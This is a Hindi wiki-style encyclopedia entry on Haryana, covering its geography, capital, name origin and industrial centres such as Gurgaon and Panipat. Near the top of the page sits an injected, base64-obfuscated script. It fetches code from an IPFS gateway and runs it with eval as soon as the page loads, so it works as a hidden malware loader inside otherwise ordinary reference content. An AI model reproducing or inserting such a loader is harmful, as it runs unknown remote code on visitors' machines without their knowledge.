हरियाणा

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
Govind (चर्चा | योगदान) द्वारा परिवर्तित १३:०९, ११ दिसम्बर २०१० का अवतरण
नेविगेशन पर जाएँ खोज पर जाएँ

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

हरियाणा / Hariyana / Haryana

हरियाणा का मानचित्र

हरियाणा उत्तर भारत का एक प्रांत है जिसे पंजाब[१] से 1966 में अलग किया गया था। इसकी सीमायें उत्तर में पंजाब एवं हिमाचल प्रदेश[२], पश्चिम तथा दक्षिण में राजस्थान से, एवं पूर्व में उत्तराखंड, उत्तर प्रदेश तथा यमुना नदी से बंधी है। भारतीय राजधानी दिल्ली के तीन तरफ भी हरियाणा की सीमायें लगी हैं जिसकी वजह से राष्ट्रीय राजधानी क्षेत्र दिल्ली[३] का एक बड़ा हिस्सा हरियाणा में शामिल है। हरियाणा प्रदेश की राजधानी चंडीगढ[४] है जो केंद्रशासित प्रदेश होने के साथ साथ पंजाब की भी राजधानी है।

  • हरियाणा का शब्दार्थ है 'परमेश्वर का निवास', हरि (विष्णु) और अयन (घर) से मिलकर हरियाणा शब्द बना है।
  • हरियाणा सम्पूर्ण भारत के विकास का अग्रदूत माना जाता है।
  • हरियाणा ब्रिटिश शासन मे पंजाब प्रान्त का भाग रहा है , इसके इतिहास में पंजाब के इतिहास की महत्वपूर्ण भूमिका है।
  • हरियाणा में प्रति व्यक्ति आमदनी गोवा[५] और दिल्ली के बाद है। हरियाणा में प्रति व्यक्ति औसत आय 29,887 रुपये प्रतिवर्ष (वर्ष 2006 के आंकडों के अनुसार) है।
  • हरियाणा औद्योगिक उत्पादन में देश के अग्रणी राज्यों में से एक है।
  • गुड़गांव शहर सूचना प्रौद्योगिकी और ऑटोमोबाइल उद्योग के एक प्रमुख केंद्र के रूप में उभरा है। यह निर्माण क्षेत्र का भी प्रमुख केंद्र है। यहाँ मारुति उद्योग लिमिटेड, जो भारत की सबसे बड़ी ऑटोमोबाइल निर्माता कंपनी है, और हीरो होंडा लिमिटेड, जो दोपहिया वाहनों की सबसे बड़े निर्माता कम्पनी हैं, का मुख्य कार्यालय है।
  • पानीपत , पंचकूला और फ़रीदाबाद भी हरियाणा के प्रमुख औद्योगिक केन्द्र हैं।
  • पानीपत रिफ़ाइनरी दक्षिण एशिया की दूसरी सबसे बड़ी रिफ़ाइनरी है।
  • हरियाणा राज्य में इस्पात और वस्त्र उद्योग भी बहुत विकसित है।
हरियाणा को विस्तार से पढ़ने के लिये यहाँ क्लिक करें


बाहरी कड़ियाँ

  1. पंजाब को हमारी वेबसाइट भारतकोश पर विस्तार से पढ़ें।
  2. हिमाचल प्रदेश को हमारी वेबसाइट भारतकोश पर विस्तार से पढ़ें।
  3. राष्ट्रीय राजधानी क्षेत्र दिल्ली को हमारी वेबसाइट भारतकोश पर विस्तार से पढ़ें।
  4. चण्‍डीगढ़ को हमारी वेबसाइट भारतकोश पर विस्तार से पढ़ें।
  5. गोवा को हमारी वेबसाइट भारतकोश पर विस्तार से पढ़ें।